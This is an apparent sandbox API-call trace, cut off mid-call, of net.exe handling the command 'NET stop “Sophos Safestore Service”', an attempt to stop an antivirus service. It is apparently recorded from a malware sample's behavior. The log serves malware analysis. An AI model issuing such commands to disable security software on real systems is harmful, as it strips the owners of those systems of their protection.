_String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0208.136] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0208.137] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0208.137] _wcsicmp (_String1="SESS", _String2="ΓÇ£Sophos") returned -832 [0208.137] _wcsicmp (_String1="SESS", _String2="Safestore") returned 4 [0208.137] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0208.137] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0208.137] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0208.137] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0208.137] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0208.137] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0208.137] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0208.137] _wcsicmp (_String1="STATS", _String2="ΓÇ£Sophos") returned -832 [0208.137] _wcsicmp (_String1="STATS", _String2="Safestore") returned 19 [0208.137] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0208.137] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0208.137] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0208.137] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0208.137] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0208.137] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0208.137] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0208.137] _wcsicmp (_String1="USERS", _String2="ΓÇ£Sophos") returned -830 [0208.137] _wcsicmp (_String1="USERS", _String2="Safestore") returned 2 [0208.137] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0208.137] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0208.137] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0208.137] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0208.137] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0208.137] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0208.137] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0208.137] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Sophos") returned -833 [0208.137] _wcsicmp (_String1="REDIRECTOR", _String2="Safestore") returned -1 [0208.137] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0208.137] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0208.137] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0208.137] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0208.138] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Sophos") returned -833 [0208.138] _wcsicmp (_String1="REDIR", _String2="Safestore") returned -1 [0208.138] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0208.138] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0208.138] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0208.138] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0208.138] _wcsicmp (_String1="RDR", _String2="ΓÇ£Sophos") returned -833 [0208.138] _wcsicmp (_String1="RDR", _String2="Safestore") returned -1 [0208.138] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0208.138] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0208.138] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0208.138] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0208.138] _wcsicmp (_String1="WORK", _String2="ΓÇ£Sophos") returned -828 [0208.138] _wcsicmp (_String1="WORK", _String2="Safestore") returned 4 [0208.138] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0208.138] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0208.138] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0208.138] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0208.138] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Sophos") returned -828 [0208.138] _wcsicmp (_String1="WKSTA", _String2="Safestore") returned 4 [0208.138] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0208.138] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0208.138] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0208.138] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0208.138] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Sophos") returned -835 [0208.138] _wcsicmp (_String1="PRDR", _String2="Safestore") returned -3 [0208.138] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0208.138] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0208.138] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0208.138] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0208.139] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Sophos") returned -847 [0208.139] _wcsicmp (_String1="DEVRDR", _String2="Safestore") returned -15 [0208.139] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0208.139] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0208.139] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0208.139] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0208.139] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0208.139] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0208.139] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0208.139] _wcsicmp (_String1="SVR", _String2="ΓÇ£Sophos") returned -832 [0208.139] _wcsicmp (_String1="SVR", _String2="Safestore") returned 21 [0208.139] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0208.139] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0208.139] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0208.139] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0208.139] _wcsicmp (_String1="SRV", _String2="ΓÇ£Sophos") returned -832 [0208.139] _wcsicmp (_String1="SRV", _String2="Safestore") returned 17 [0208.139] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0208.139] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0208.139] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x31f800, nSize=0x0, Arguments=0x31f7fc | out: lpBuffer="㼨sꔺ瓡") returned 0x1c [0208.139] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0208.139] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0208.139] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0208.139] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0208.139] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0208.139] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0208.139] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0208.139] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0208.139] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0208.139] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0208.139] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0208.140] wcscpy_s (in: _Destination=0xb5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0208.140] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a00000 [0208.140] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a00000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0xb5b338, nSize=0x800, Arguments=0xb59dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0208.141] GetFileType (hFile=0x26c) returned 0x3 [0208.141] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x7341f8 [0208.141] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x7341f8, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0208.141] WriteFile (in: hFile=0x26c, lpBuffer=0x7341f8, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x31f7e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f7e0, lpOverlapped=0x0) returned 0 [0208.141] LocalFree (hMem=0x7341f8) returned 0x0 [0208.141] GetFileType (hFile=0x26c) returned 0x3 [0208.141] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x733d88 [0208.141] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x733d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ns", lpUsedDefaultChar=0x0) returned 2 [0208.141] WriteFile (in: hFile=0x26c, lpBuffer=0x733d88, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f7e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f7e0, lpOverlapped=0x0) returned 0 [0208.141] LocalFree (hMem=0x733d88) returned 0x0 [0208.141] wcscpy_s (in: _Destination=0x31f898, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0208.141] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0208.141] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0208.141] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0208.142] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos") returned 0x0 [0208.142] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos ") returned 0x0 [0208.142] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos ", _SizeInWords=0x200, _Source="Safestore", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Safestore") returned 0x0 [0208.142] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Safestore", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Safestore ") returned 0x0 [0208.142] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Safestore ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥") returned 0x0 [0208.142] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s댸µ1Ѱµɬ") returned 0xad [0208.142] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes | ", _MaxCount=0x27) returned 18 [0208.142] LocalFree (hMem=0x735860) returned 0x0 [0208.142] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x2e [0208.142] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD | /D", _MaxCount=0x27) returned 16 [0208.142] LocalFree (hMem=0x733f70) returned 0x0 [0208.142] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0x7d [0208.142] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:tim", _MaxCount=0x27) returned 16 [0208.142] LocalFree (hMem=0x735860) returned 0x0 [0208.142] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x26 [0208.142] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r\n", _MaxCount=0x27) returned 16 [0208.142] LocalFree (hMem=0x733f70) returned 0x0 [0208.142] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x19 [0208.142] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x27) returned 16 [0208.142] LocalFree (hMem=0x733f70) returned 0x0 [0208.142] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x1b [0208.142] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x27) returned 13 [0208.142] LocalFree (hMem=0x733f70) returned 0x0 [0208.142] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0xbe [0208.142] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text\"]", _MaxCount=0x27) returned 12 [0208.142] LocalFree (hMem=0x735860) returned 0x0 [0208.142] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x33 [0208.142] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET comma", _MaxCount=0x27) returned 11 [0208.142] LocalFree (hMem=0x733f70) returned 0x0 [0208.142] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x19 [0208.142] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x27) returned 11 [0208.142] LocalFree (hMem=0x733f70) returned 0x0 [0208.142] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0xc1 [0208.142] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:\"t", _MaxCount=0x27) returned 7 [0208.142] LocalFree (hMem=0x735860) returned 0x0 [0208.142] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x16 [0208.143] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x27) returned 3 [0208.143] LocalFree (hMem=0x733f70) returned 0x0 [0208.143] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x33 [0208.143] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELETE]", _MaxCount=0x27) returned 15 [0208.143] LocalFree (hMem=0x733f70) returned 0x0 [0208.143] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0x234 [0208.143] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n sharena", _MaxCount=0x27) returned 12 [0208.143] LocalFree (hMem=0x735860) returned 0x0 [0208.143] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x13 [0208.143] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x27) returned 14 [0208.143] LocalFree (hMem=0x733f70) returned 0x0 [0208.143] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x14 [0208.143] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x27) returned 14 [0208.143] LocalFree (hMem=0x733f70) returned 0x0 [0208.143] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x14 [0208.143] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x27) returned 14 [0208.143] LocalFree (hMem=0x733f70) returned 0x0 [0208.143] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x15 [0208.143] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x27) returned 14 [0208.143] LocalFree (hMem=0x733f70) returned 0x0 [0208.143] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x15 [0208.143] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x27) returned 14 [0208.143] LocalFree (hMem=0x733f70) returned 0x0 [0208.143] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x16 [0208.143] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x27) returned 14 [0208.143] LocalFree (hMem=0x733f70) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x11 [0208.144] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x27) returned 14 [0208.144] LocalFree (hMem=0x733f70) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x14 [0208.144] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x27) returned 14 [0208.144] LocalFree (hMem=0x733f70) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x12 [0208.144] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x27) returned 14 [0208.144] LocalFree (hMem=0x733f70) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0xf [0208.144] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x27) returned 14 [0208.144] LocalFree (hMem=0x733f70) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x17 [0208.144] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x27) returned 14 [0208.144] LocalFree (hMem=0x733f70) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x18 [0208.144] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x27) returned 14 [0208.144] LocalFree (hMem=0x733f70) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x2a [0208.144] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER]\r", _MaxCount=0x27) returned 14 [0208.144] LocalFree (hMem=0x733f70) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x15 [0208.144] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x27) returned 19 [0208.144] LocalFree (hMem=0x733f70) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0x58 [0208.144] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN[:", _MaxCount=0x27) returned -1 [0208.144] LocalFree (hMem=0x735860) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0x184 [0208.144] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\computerna", _MaxCount=0x27) returned -2 [0208.144] LocalFree (hMem=0x735860) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0xc7 [0208.144] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET USER\r\n[username [password | *] [opt", _MaxCount=0x27) returned -2 [0208.144] LocalFree (hMem=0x735860) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0x47 [0208.144] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | [/", _MaxCount=0x27) returned -3 [0208.144] LocalFree (hMem=0x735860) returned 0x0 [0208.144] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0xc2 [0208.145] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONFIG", _MaxCount=0x27) returned 19 [0208.145] LocalFree 